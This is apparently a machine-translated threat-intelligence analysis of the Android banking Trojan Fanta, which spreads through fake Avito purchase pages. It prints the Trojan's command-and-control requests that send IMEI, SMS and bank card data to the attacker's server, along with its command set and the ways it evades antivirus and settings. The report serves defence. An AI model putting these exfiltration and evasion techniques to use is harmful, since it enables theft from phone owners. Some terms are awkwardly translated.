Wata rana kuna son siyar da wani abu akan Avito kuma, bayan buga cikakken bayanin samfuran ku (misali, tsarin RAM), zaku karɓi wannan saƙo:
Da zarar ka bude hanyar haɗin yanar gizon, za ka ga wani shafi da ba shi da lahani yana sanar da kai, mai sayarwa mai farin ciki da nasara, cewa an yi siya:
Da zarar ka danna maballin “Ci gaba”, za a sauke fayil ɗin APK tare da gunki da kuma suna mai ban sha'awa a cikin na'urarka ta Android. Kun shigar da aikace-aikacen da saboda wasu dalilai suka nemi haƙƙin Sabis na Accessibility, sai taga wasu windows biyu suka bayyana da sauri suka ɓace kuma… Shi ke nan.
Za ku je don duba ma'auni, amma saboda wasu dalilai app ɗin ku na banki yana sake neman bayanan katin ku. Bayan shigar da bayanan, wani abu mai ban tsoro ya faru: saboda wasu dalilai har yanzu ba a san ku ba, kuɗi ya fara ɓacewa daga asusun ku. Kuna ƙoƙarin magance matsalar, amma wayarka ta ƙi: tana danna maɓallin "Back" da "Gida", baya kashewa kuma baya ba ku damar kunna kowane matakan tsaro. A sakamakon haka, an bar ku ba tare da kuɗi ba, kayan ku ba a saya ba, kun rikice kuma kuna mamaki: me ya faru?
Amsar mai sauƙi ce: kun zama wanda aka azabtar da Android Trojan Fanta, memba na dangin Flexnet. Ta yaya hakan ya faru? Bari mu bayyana yanzu.
Mawallafa: Andrey Polovinkin, ƙwararriyar ƙarami a cikin nazarin malware, Ivan Pisarev, kwararre a cikin nazarin malware.
Wasu ƙididdiga
An fara sanin dangin Flexnet na Android Trojans a cikin 2015. A cikin ɗan gajeren lokaci na aiki, dangi ya faɗaɗa zuwa nau'ikan nau'ikan nau'ikan: Fanta, Limebot, Lipton, da sauransu. Trojan, da kuma abubuwan more rayuwa da ke da alaƙa da shi, ba su tsaya cik ba: ana haɓaka sabbin tsare-tsare masu tasiri na rarrabawa - a cikin yanayinmu, shafukan yanar gizo masu inganci waɗanda ke nufin takamaiman mai siyar da mai amfani, kuma masu haɓaka Trojan suna bin yanayin gaye a ciki. rubuce-rubucen ƙwayoyin cuta - ƙara sabbin ayyuka waɗanda ke ba da damar yin satar kuɗi cikin inganci daga na'urorin da suka kamu da cutar da hanyoyin kariya.
Yaƙin neman zaɓe da aka bayyana a cikin wannan labarin yana nufin masu amfani ne daga Rasha; an yi rikodin ƙaramin adadin na'urorin da suka kamu da cutar a Ukraine, har ma kaɗan a Kazakhstan da Belarus.
Duk da cewa Flexnet ya kasance a fagen Android Trojan sama da shekaru 4 yanzu kuma masu bincike da yawa sun yi nazari dalla-dalla, har yanzu yana cikin kyakkyawan tsari. Fara daga Janairu 2019, yuwuwar adadin lalacewa ya wuce miliyan 35 rubles - kuma wannan kawai don yaƙin neman zaɓe a Rasha. A cikin 2015, an siyar da nau'ikan nau'ikan wannan Trojan na Android akan tarukan karkashin kasa, inda kuma za'a iya samun lambar tushe na Trojan mai cikakken bayani. Wannan yana nufin cewa kididdigar lalacewa a duniya sun fi ban sha'awa. Ba alama ce mara kyau ga irin wannan tsoho ba, ko ba haka ba?
Daga sayarwa zuwa yaudara
Kamar yadda ake iya gani daga hoton hoton da aka gabatar a baya na shafin phishing don sabis ɗin Intanet don aika tallan Avito, an shirya shi don takamaiman wanda aka azabtar. A bayyane yake, maharan suna amfani da ɗaya daga cikin masu binciken Avito, wanda ke fitar da lambar waya da sunan mai siyarwa, da bayanin samfurin. Bayan fadada shafin da shirya fayil ɗin apk, ana aika wanda aka azabtar da SMS tare da sunansa da hanyar haɗi zuwa shafin yanar gizo mai ɗauke da bayanin samfurinsa da adadin da aka karɓa daga “sayar” samfurin. Ta danna maɓallin, mai amfani yana karɓar fayil ɗin apk na mugunta - Fanta.
Binciken shcet491[.] ru yankin ya nuna cewa an wakilta shi zuwa sabar DNS na Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Fayil ɗin yankin ya ƙunshi shigarwar da ke nuni zuwa adiresoshin IP 31.220.23[.]236, 31.220.23[.]243, da 31.220.23[.]235. Koyaya, babban rikodin albarkatu na yankin (Rikodin) yana nuna sabar mai adireshin IP 178.132.1[.]240.
Adireshin IP 178.132.1[.]240 yana cikin Netherlands kuma yana cikin mai masaukin baki WorldStream. Adireshin IP 31.220.23[.]235, 31.220.23[.]236 da 31.220.23[.]243 suna cikin Burtaniya kuma suna cikin sabar hosting HOSTINGER. Ana amfani dashi azaman mai rikodin budeprov-ru. Waɗannan yankuna kuma sun warware zuwa adireshin IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Ya kamata a lura cewa ana samun hanyoyin haɗin kai a cikin tsari mai zuwa daga kusan dukkanin yankuna:
http://(www.){0,1}<%domain%>/[0-9]{7}
Wannan samfuri kuma ya ƙunshi hanyar haɗi daga saƙon SMS. Dangane da bayanan tarihi, an gano cewa yanki ɗaya ya yi daidai da alaƙa da yawa a cikin tsarin da aka kwatanta a sama, wanda ke nuna cewa an yi amfani da yanki ɗaya don rarraba Trojan ga mutane da yawa waɗanda abin ya shafa.
Bari mu yi tsalle a gaba kadan: Trojan da aka zazzage ta hanyar hanyar haɗi daga SMS yana amfani da adireshin azaman uwar garken sarrafawa onuseseddohap[.] kulob. An yi rajistar wannan yanki a ranar 2019-03-12, kuma farawa daga 2019-04-29, aikace-aikacen APK sun yi hulɗa tare da wannan yanki. Dangane da bayanan da aka samu daga VirusTotal, jimillar aikace-aikace 109 sun yi mu'amala da wannan uwar garken. Yankin da kansa ya warware zuwa adireshin IP 217.23.14[.]27, wanda ke cikin Netherlands kuma mallakar mai masaukin baki ne WorldStream. Ana amfani dashi azaman mai rikodin sunaya. Domains kuma an warware su zuwa wannan adireshin IP bad-racoon[.] kulob (fara daga 2018-09-25) da bad-racoon[.] live (daga 2018-10-25). Tare da yanki bad-racoon[.] kulob fiye da fayilolin apk 80 da suka yi hulɗa da su bad-racoon[.] live - fiye da 100.
Gabaɗaya, harin yana ci gaba kamar haka:
Menene ke ƙarƙashin murfin Fanta?
Kamar sauran Trojans na Android, Fanta yana iya karantawa da aika saƙonnin SMS, yin buƙatun USSD, da kuma nuna tagoginsa a saman aikace-aikacen (ciki har da na banki). Koyaya, arsenal na aikin wannan dangi ya isa: Fanta ya fara amfani Sabis na Samun Dama don dalilai daban-daban: karanta abubuwan da ke cikin sanarwa daga wasu aikace-aikacen, hana ganowa da dakatar da aiwatar da Trojan akan na'urar da ta kamu da cutar, da sauransu. Fanta yana aiki akan duk nau'ikan Android waɗanda ba ƙasa da 4.4 ba. A cikin wannan labarin za mu yi dubi sosai ga samfurin Fanta mai zuwa:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Nan da nan bayan ƙaddamarwa
Nan da nan bayan ƙaddamarwa, Trojan ɗin yana ɓoye gunkinsa. Aikace-aikacen na iya aiki ne kawai idan sunan na'urar da ke ɗauke da cutar baya cikin jerin:
- android_x86
- VirtualBox
- Nexus 5X (bullhead)
- Nexus 5 (reza)
Ana gudanar da wannan rajistan a cikin babban sabis na Trojan - MainService. Lokacin da aka ƙaddamar da farko, ana ƙaddamar da sigogin ƙayyadaddun aikace-aikacen zuwa dabi'u na asali (tsarin adana bayanan sanyi da ma'anar su daga baya), kuma an yi rajistar sabon na'urar da ta kamu da cutar akan uwar garken sarrafawa. Za a aika buƙatar HTTP POST mai nau'in saƙo zuwa uwar garken rajistar_bot da bayanai game da na'urar da ta kamu da cutar (Sigar Android, IMEI, lambar waya, sunan mai aiki da lambar ƙasar da aka yiwa afareta rajista). Adireshin yana aiki azaman uwar garken sarrafawa hXXp://onuseseddohap[.]club/controller.php. A cikin martani, uwar garken yana aika saƙo mai ɗauke da filayen bot_id, bot_pwd, uwar garken - aikace-aikacen yana adana waɗannan ƙimar azaman sigogi na uwar garken CnC. Siga uwar garken na zaɓi idan ba a karɓi filin ba: Fanta yana amfani da adireshin rajista - hXXp://onuseseddohap[.]club/controller.php. Ana iya amfani da aikin canza adireshin CnC don magance matsaloli guda biyu: don rarraba nauyin a ko'ina tsakanin sabobin da yawa (idan akwai adadi mai yawa na na'urori masu kamuwa da cuta, nauyin da ke kan sabar gidan yanar gizon da ba a inganta shi ba zai iya zama babba), da kuma amfani da shi. madadin uwar garken idan aka sami gazawar ɗaya daga cikin sabar CnC .
Idan kuskure ya faru yayin aika buƙatar, Trojan zai maimaita aikin rajista bayan daƙiƙa 20.
Da zarar an yi nasarar yin rijistar na'urar, Fanta zai nuna saƙo mai zuwa ga mai amfani:
Bayani mai mahimmanci: sabis ɗin da ake kira Tsaro tsarin - sunan sabis na Trojan, kuma bayan danna maɓallin OK Taga zai buɗe tare da saitunan isa ga na'urar da ta kamu da cutar, inda mai amfani dole ne ya ba da haƙƙin Samun dama ga sabis ɗin mara kyau:
Da zaran mai amfani ya kunna Sabis na Samun Dama, Fanta ya sami damar yin amfani da abubuwan da ke cikin windows aikace-aikacen da ayyukan da aka yi a cikinsu:
Nan da nan bayan karɓar haƙƙin Samun dama, Trojan yana buƙatar haƙƙin gudanarwa da haƙƙin karanta sanarwar:
Yin amfani da Sabis ɗin Samun damar, aikace-aikacen yana kwaikwayon maɓallan maɓalli, ta haka yana ba wa kansa duk haƙƙoƙin da suka dace.
Fanta yana ƙirƙira misalan bayanai da yawa (wanda za a bayyana su daga baya) masu mahimmanci don adana bayanan daidaitawa, da kuma bayanan da aka tattara a cikin tsari game da na'urar da ta kamu da cutar. Don aika bayanan da aka tattara, Trojan yana ƙirƙirar aikin maimaitawa wanda aka tsara don zazzage filayen daga bayanan bayanai kuma karɓar umarni daga uwar garken sarrafawa. An saita tazara don samun damar CnC dangane da nau'in Android: a cikin yanayin 5.1, tazarar zata kasance 10 seconds, in ba haka ba 60 seconds.
Don karɓar umarnin, Fanta yayi buƙata SamunTask zuwa uwar garken gudanarwa. A cikin martani, CnC na iya aika ɗayan umarni masu zuwa:
| tawagar | Description |
|---|---|
| 0 | Aika sakon SMS |
| 1 | Yi kiran waya ko umarnin USSD |
| 2 | Yana sabunta siga lokaci lokaci |
| 3 | Yana sabunta siga sakonnin |
| 6 | Yana sabunta siga sms Manager |
| 9 | Fara tattara saƙonnin SMS |
| 11 | Sake saita wayarka zuwa saitunan masana'anta |
| 12 | Kunna/Kashe shigar da akwatin maganganu |
Fanta kuma yana karɓar sanarwa daga aikace-aikacen banki 70, tsarin biyan kuɗi da sauri da e-wallets kuma yana adana su a cikin ma'ajin bayanai.
Adana sigogin daidaitawa
Don adana sigogin daidaitawa, Fanta yana amfani da daidaitaccen tsari don dandamalin Android - Da zaɓin- fayiloli. Za a adana saitunan zuwa fayil mai suna saituna. Bayanin sigogin da aka adana yana cikin tebur da ke ƙasa.
| Имя | Ƙimar ta asali | Dabi'u masu yiwuwa | Description |
|---|---|---|---|
| id | 0 | Intanet | Bot ID |
| uwar garken | hXXp://onuseseddohap[.]club/ | URL | Sarrafa adireshin uwar garke |
| pwd | - | kirtani | Kalmar sirrin uwar garke |
| lokaci lokaci | 20 | Intanet | Tazarar lokaci. Yana nuna tsawon lokacin da ya kamata a jinkirta ayyuka masu zuwa:
|
| sakonnin | dukan | duk/telLambar | Idan filin yayi daidai da zaren dukan ko lambar waya, to, sakon SMS da aka karɓa za a kama shi ta aikace-aikacen kuma ba za a nuna wa mai amfani ba |
| sms Manager | 0 | 0/1 | Kunna/ kashe aikace-aikacen azaman tsoho mai karɓar SMS |
| readDialogue | arya | Gaskiya/karya | Kunna/Kashe shiga taron Lamarin Samun damar |
Fanta kuma yana amfani da fayil ɗin sms Manager:
| Имя | Ƙimar ta asali | Dabi'u masu yiwuwa | Description |
|---|---|---|---|
| pckg | - | kirtani | Sunan mai sarrafa saƙon SMS da aka yi amfani da shi |
Yin hulɗa tare da bayanan bayanai
A lokacin aikinsa, Trojan yana amfani da bayanan bayanai guda biyu. Database mai suna a ana amfani da su wajen adana bayanai daban-daban da aka tattara daga wayar. Sunan ma'ajin bayanai na biyu fanta.db kuma ana amfani dashi don adana saitunan da ke da alhakin ƙirƙirar tagogin phishing da aka tsara don tattara bayanai game da katunan banki.
Trojan yana amfani da bayanai а don adana bayanan da aka tattara da kuma shiga ayyukanku. Ana adana bayanai a cikin tebur rajistan ayyukan. Don ƙirƙirar tebur, yi amfani da tambayar SQL mai zuwa:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Ma'ajiyar bayanai ta ƙunshi bayanai masu zuwa:
1. Shiga farkon na'urar da ta kamu da saƙo Wayar ta kunna!
2. Sanarwa daga aikace-aikace. Ana samar da saƙon bisa ga samfuri mai zuwa:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bayanan katin banki daga siffofin phishing da Trojan ɗin ya ƙirƙira. Siga VIEW_NAME na iya zama ɗaya daga cikin waɗannan:
- AliExpress
- Avito
- Google Play
- Daban-daban <% App Name%>
Ana shigar da sakon a cikin tsari:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Saƙonnin SMS masu shigowa/masu fita a cikin tsari:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Bayani game da kunshin da ke ƙirƙirar akwatin maganganu a cikin tsari:
(<%Package name%>)<%Package information%>
Misali tebur rajistan ayyukan:
Ɗaya daga cikin ayyukan Fanta shine tarin bayanai game da katunan banki. Tarin bayanai yana faruwa ta hanyar ƙirƙirar tagogin phishing lokacin buɗe aikace-aikacen banki. Trojan yana ƙirƙirar taga phishing sau ɗaya kawai. Ana adana bayanan da aka nuna taga ga mai amfani a cikin tebur saituna a cikin bayanan fanta.db. Don ƙirƙirar bayanai, yi amfani da tambayar SQL mai zuwa:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Duk filayen tebur saituna ta tsohuwa an fara farawa zuwa 1 (ƙirƙirar taga mai saɓo). Bayan mai amfani ya shigar da bayanan su, za a saita ƙimar zuwa 0. Misalin filayen tebur saituna:
- iya_login - filin yana da alhakin nuna fom lokacin buɗe aikace-aikacen banki
- first_bank - ba a amfani
- iya_avito - filin yana da alhakin nuna fom lokacin buɗe aikace-aikacen Avito
- can_ali - filin yana da alhakin nuna fom lokacin buɗe aikace-aikacen Aliexpress
- iya_wani - filin yana da alhakin nuna fom lokacin buɗe kowane aikace-aikacen daga jerin: Yula, Pandao, Drom Auto, Wallet. Rangwamen kuɗi da katunan kari, Aviasales, Booking, Trivago
- can_kati - filin yana da alhakin nuna fom lokacin buɗewa Google Play
Yin hulɗa tare da uwar garken gudanarwa
Sadarwar hanyar sadarwa tare da uwar garken gudanarwa yana faruwa ta hanyar ka'idar HTTP. Don aiki tare da hanyar sadarwar, Fanta yana amfani da mashahurin ɗakin karatu na Retrofit. Ana aika buƙatun zuwa: hXXp://onuseseddohap[.]club/controller.php. Ana iya canza adireshin uwar garken lokacin yin rijista akan uwar garken. Ana iya aika kukis don amsawa daga uwar garken. Fanta yana yin buƙatun masu zuwa ga uwar garken:
- Rijistar bot akan uwar garken sarrafawa yana faruwa sau ɗaya, a farkon ƙaddamarwa. Ana aika bayanai masu zuwa game da na'urar da ta kamu da cutar zuwa uwar garken:
· cookie - kukis da aka karɓa daga uwar garken (ƙimar tsoho ba komai bane kirtani)
· yanayin - kirtani akai-akai rajistar_bot
· prefix - lamba akai-akai 2
· sigar_sdk - an kafa shi bisa ga samfuri mai zuwa: <%Build.MODEL%>/<% Gina.VERSION.SAKI%>(Avit)
· IMEI - IMEI na na'urar da ta kamu da cutar
· kasar - lambar ƙasar da aka yiwa ma'aikaci rajista, a cikin tsarin ISO
· lambar - lambar tarho
· sadarwarka - sunan mai aikiMisalin buƙatar da aka aika zuwa uwar garken:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Don amsa buƙatar, uwar garken dole ne ta dawo da wani abu na JSON mai ɗauke da sigogi masu zuwa:
· bot_id - ID na na'urar da ta kamu da cutar. Idan bot_id yayi daidai da 0, Fanta zai sake aiwatar da buƙatar.
bot_pwd - kalmar sirri don uwar garken.
uwar garken - sarrafa adireshin uwar garke. Siga na zaɓi. Idan ba a kayyade siga ba, adireshin da aka ajiye a aikace-aikacen za a yi amfani da shi.Misali JSON abu:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Neman karɓar umarni daga uwar garken. Ana aika bayanai masu zuwa zuwa uwar garken:
· cookie - cookies samu daga uwar garken
· karo - id na na'urar cutar da aka karɓa lokacin aika buƙatar rajistar_bot
· pwd - kalmar sirri don uwar garken
· divice_admin - filin yana ƙayyade ko an sami haƙƙin mai gudanarwa. Idan an sami haƙƙin mai gudanarwa, filin yana daidai da 1, in ba haka ba 0
· Hanyoyin - Matsayin aiki na Sabis isa. Idan an fara sabis ɗin, ƙimar ita ce 1, in ba haka ba 0
· Manajan SMS - yana nuna ko an kunna Trojan azaman aikace-aikacen tsoho don karɓar SMS
· allon - yana nuna yanayin yanayin allo. Za a saita ƙimar 1, idan allon yana kunne, in ba haka ba 0;Misalin buƙatar da aka aika zuwa uwar garken:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Dangane da umarnin, uwar garken na iya dawo da wani abu JSON tare da sigogi daban-daban:
· tawagar Aika sakon SMS: Sifofin sun ƙunshi lambar waya, rubutun saƙon SMS da ID na saƙon da ake aikawa. Ana amfani da mai ganowa lokacin aika saƙo zuwa uwar garken tare da nau'in saitaSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· tawagar Yi kiran waya ko umarnin USSD: Lambar waya ko umarni yana zuwa a jikin amsawa.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· tawagar Canja sigar tazara.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· tawagar Canja siga na tsaka-tsaki.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· tawagar Canja filin SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· tawagar Tattara saƙonnin SMS daga na'urar da ta kamu da cutar.
{ "response": [ { "mode": 9 } ], "status":"ok" }· tawagar Sake saita wayarka zuwa saitunan masana'anta:
{ "response": [ { "mode": 11 } ], "status":"ok" }· tawagar Canja ma'aunin ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Aika sako tare da nau'in saitaSmsStatus. Ana yin wannan buƙatar bayan an aiwatar da umarnin Aika sakon SMS. Buqatar ta yi kama da haka:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Ana loda bayanan bayanai. Ana watsa jere ɗaya ta kowace buƙata. Ana aika bayanai masu zuwa zuwa uwar garken:
· cookie - cookies samu daga uwar garken
· yanayin - kirtani akai-akai saitaSaveInboxSms
· karo - id na na'urar cutar da aka karɓa lokacin aika buƙatar rajistar_bot
· rubutu - rubutu a cikin rikodin bayanai na yanzu (filin d daga tebur rajistan ayyukan a cikin bayanan а)
· lambar - sunan rikodin bayanai na yanzu (filin p daga tebur rajistan ayyukan a cikin bayanan а)
· sms_mode - ƙimar lamba (filin m daga tebur rajistan ayyukan a cikin bayanan а)Buqatar ta yi kama da haka:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Idan an samu nasarar aika zuwa uwar garken, za a share layin daga tebur. Misalin abun JSON da uwar garken ya dawo dashi:
{ "response":[], "status":"ok" }
Yin hulɗa tare da Sabis na Samun damar
An aiwatar da Sabis ɗin Accessibility don sauƙaƙe na'urorin Android don amfani da nakasassu. A mafi yawan lokuta, ana buƙatar hulɗar jiki don yin hulɗa tare da aikace-aikacen. Sabis na Accessibility yana ba ku damar yin su ta hanyar shirye-shirye. Fanta yana amfani da sabis ɗin don ƙirƙirar tagogi na karya a cikin aikace-aikacen banki da hana masu amfani buɗe saitunan tsarin da wasu aikace-aikacen.
Yin amfani da ayyuka na Sabis ɗin Samun damar, Trojan yana lura da canje-canje zuwa abubuwa akan allon na'urar da ta kamu da cutar. Kamar yadda aka bayyana a baya, saitunan Fanta sun ƙunshi siga da ke da alhakin ayyukan shiga tare da akwatunan maganganu - readDialogue. Idan an saita wannan siga, za a ƙara bayani game da suna da bayanin fakitin da ya jawo taron zuwa ma'adanar bayanai. Trojan yana aiwatar da ayyuka masu zuwa lokacin da abubuwan suka faru:
- Yana kama da latsa maɓallan baya da na gida a cikin waɗannan lokuta:
· idan mai amfani yana so ya sake yin na'urarsa
· idan mai amfani yana son share aikace-aikacen "Avito" ko canza haƙƙin shiga
· idan akwai ambaton aikace-aikacen "Avito" akan shafin
· lokacin buɗe aikace-aikacen Kare Google Play
· lokacin buɗe shafuka tare da saitunan Sabis na Accessibility
· lokacin da akwatin maganganu na Tsaron Tsaro ya bayyana
· lokacin buɗe shafin tare da saitunan "Zana kan sauran aikace-aikacen".
· lokacin bude shafin “Applications”, “Recovery and reset”, “Reset Data”, “Sake saitin saitin”, “Developer panel”, “Special. dama", "Dama ta musamman", "Hakkoki na musamman"
· idan wasu aikace-aikace ne suka haifar da taron.Jerin aikace-aikace
- android
- Jagora Lite
- Mai tsabta mai tsabta
- Tsabtace Jagora don x86 CPU
- Gudanar da Izinin Aikace-aikacen Meizu
- MIUI Tsaro
- Mai Tsabtace Jagora - Antivirus & Cache da Mai Tsabtace Shara
- Ikon iyaye da GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Tsaron Yanar Gizo Beta
- Mai Tsabtace Virus, Antivirus, Mai Tsaftace (Max Tsaro)
- Mobile AntiVirus Security PRO
- Avast riga-kafi & kariya ta kyauta 2019
- Tsaro ta wayar hannu MegaFon
- Kariyar AVG don Xperia
- Tsaron Waya
- Malwarebytes riga-kafi & kariya
- Antivirus don Android 2019
- Jagoran Tsaro - Antivirus, VPN, AppLock, Booster
- AVG riga-kafi don Huawei kwamfutar hannu Manager System Manager
- Samun damar Samsung
- Samsung Smart Manager
- Jagora na Tsaro
- Mai Saurin Sauri
- Dr. Yanar Gizo
- Dokar Tsaro ta Dr.Web
- Dr.Web Mobile Control Center
- Rayuwar Tsaro ta Yanar Gizo ta Dr.Web
- Dr.Web Mobile Control Center
- Antivirus & Tsaron Waya
- Kaspersky Tsaro na Intanit: Antivirus da Kariya
- Rayuwar Batirin Kaspersky: Mai Ajiye & Mai haɓakawa
- Kaspersky Endpoint Tsaro - kariya da gudanarwa
- AVG Antivirus kyauta ta 2019 - Kariya don Android
- Maganin rigakafi ta Android
- Norton Mobile Tsaro da Antivirus
- Antivirus, Firewall, VPN, tsaro ta wayar hannu
- Tsaron Waya: riga-kafi, VPN, kariya ta sata
- Antivirus don Android
- Idan an nemi izini lokacin aika saƙon SMS zuwa gajeriyar lamba, Fanta yana kwaikwayi danna kan akwati Tuna zabi da button aikawa.
- Lokacin da kake ƙoƙarin cire haƙƙin mai gudanarwa daga Trojan, yana kulle allon wayar.
- Yana hana ƙara sabbin masu gudanarwa.
- Idan aikace-aikacen riga-kafi dr.web gano wata barazana, Fanta ta kwaikwayi latsa maɓallin watsi.
- Trojan yana kwaikwayi latsa baya da maɓallin gida idan aikace-aikacen ya haifar da taron Samsung Device Care.
- Fanta ya ƙirƙiri tagogin phishing tare da fom don shigar da bayanai game da katunan banki idan an ƙaddamar da aikace-aikacen daga jerin da ya ƙunshi kusan sabis na Intanet 30 daban-daban. Daga cikin su: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, da dai sauransu.
Siffofin phishing
Fanta yayi nazarin waɗanne aikace-aikacen ke gudana akan na'urar da ta kamu da cutar. Idan an buɗe aikace-aikacen ban sha'awa, Trojan ɗin yana nuna taga na phishing a saman duk sauran, wanda shine nau'i don shigar da bayanan katin banki. Dole ne mai amfani ya shigar da bayanai masu zuwa:
- Lambar kati
- Ranar ƙarewar katin
- CVV
- Sunan mai katin (ba ga duk bankuna ba)
Dangane da aikace-aikacen da ke gudana, za a nuna tagogin phishing daban-daban. Ga misalan wasu daga cikinsu:
Aliexpress:
Avito:
Don wasu aikace-aikace, misali. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Yadda ya kasance da gaske
Abin farin ciki, mutumin da ya karɓi saƙon SMS da aka bayyana a farkon labarin ya zama ƙwararren masani na yanar gizo. Saboda haka, ainihin, nau'in da ba darektan ba ya bambanta da wanda aka fada a baya: mutum ya karbi SMS mai ban sha'awa, bayan haka ya ba shi ga ƙungiyar IB Barazana Farauta. Sakamakon harin shine wannan labarin. Happy ending, dama? Duk da haka, ba duka labarun ke ƙarewa cikin nasara ba, kuma don kada naku yayi kama da yankewar darakta tare da asarar kuɗi, a mafi yawan lokuta ya isa ya bi waɗannan dokoki masu tsawo:
- kar a shigar da aikace-aikacen na'urar hannu tare da Android OS daga kowane tushe banda Google Play
- Lokacin shigar da aikace-aikacen, ba da kulawa ta musamman ga haƙƙoƙin da aikace-aikacen ke buƙata
- kula da kari na fayilolin da aka sauke
- shigar da sabuntawar OS na Android akai-akai
- kar a ziyarci albarkatun da ake tuhuma kuma kar a sauke fayiloli daga can
- Kar a danna hanyoyin haɗin da aka karɓa a cikin saƙonnin SMS.
source: www.habr.com